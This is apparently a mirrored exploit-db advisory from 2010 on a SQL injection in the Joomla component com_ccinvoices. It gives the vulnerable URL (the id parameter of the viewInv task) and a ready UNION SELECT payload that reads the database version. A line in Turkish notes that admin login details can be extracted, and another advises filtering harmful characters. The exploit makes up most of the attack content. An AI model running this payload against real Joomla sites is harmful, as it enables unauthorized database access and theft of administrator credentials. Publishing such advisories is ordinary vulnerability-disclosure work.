Joomla! Component ccInvoices – SQL Injection

  • 作者: FL0RiX
    日期: 2010-11-05
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15430/
  • <------------------- header data start ------------------- >
    #############################################################
    Joomla Component ccinvoices SQL Injection Vulnerability
    #############################################################
    
    # Author: Fl0riX ~ Bug Researchers
    
    # Name : Joomla com_ccinvoices
    
    # Bug Type : SQL injection
    
    # Infection : Admin Login Bilgileri Alinabilir.
    
    # Vendor: http://www.chillcreations.com/
    
    # Demo Vuln :
    [+]index.php?option=com_ccinvoices&task=viewInv&id=[EXPLOIT]
    
    # Note: register in site & Login with ur account.
    
    # Bug Fix Advice : Zararli Karakterler Filtrenmelidir.
    #############################################################
    < ------------------- header data end of ------------------- >
    < -- bug code start -- >
    EXPLOIT :
    null+and+1=0+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
    < -- bug code end of -- >